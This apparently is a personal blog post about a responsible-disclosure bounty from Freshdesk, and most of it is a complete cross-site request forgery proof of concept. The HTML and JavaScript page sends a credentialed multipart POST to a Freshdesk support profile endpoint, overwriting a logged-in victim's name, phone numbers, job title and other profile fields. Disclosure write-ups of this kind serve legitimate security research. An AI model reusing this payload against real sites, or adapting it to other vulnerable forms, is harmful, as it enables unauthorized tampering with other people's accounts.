Rewarded by Freshdesk

I was able to find out few web application related security issues in the Freshdesk website. They had a responsible disclosure policy, so I was able to report them. http://freshdesk.com/security


The application did not have proper CSRF tokens used. Any arbitrary user could change account information of other users.

<html>

  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://exploit.freshdesk.com/support/profile", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------273522544628602");
        xhr.withCredentials = true;
        var body = "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"_method\"\r\n" + 
          "\r\n" + 
          "put\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[avatar_attributes][content]\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[name]\"\r\n" + 
          "\r\n" + 
          "haxor\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[job_title]\"\r\n" + 
          "\r\n" + 
          "haxor\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[phone]\"\r\n" + 
          "\r\n" + 
          "12345678904\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[mobile]\"\r\n" + 
          "\r\n" + 
          "7894561233\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[twitter_id]\"\r\n" + 
          "\r\n" + 
          "@exfdsfdsf\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[time_zone]\"\r\n" + 
          "\r\n" + 
          "sesdsds\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[language]\"\r\n" + 
          "\r\n" + 
          "en\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"commit\"\r\n" + 
          "\r\n" + 
          "Save Changes\r\n" + 
          "-----------------------------273522544628602--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s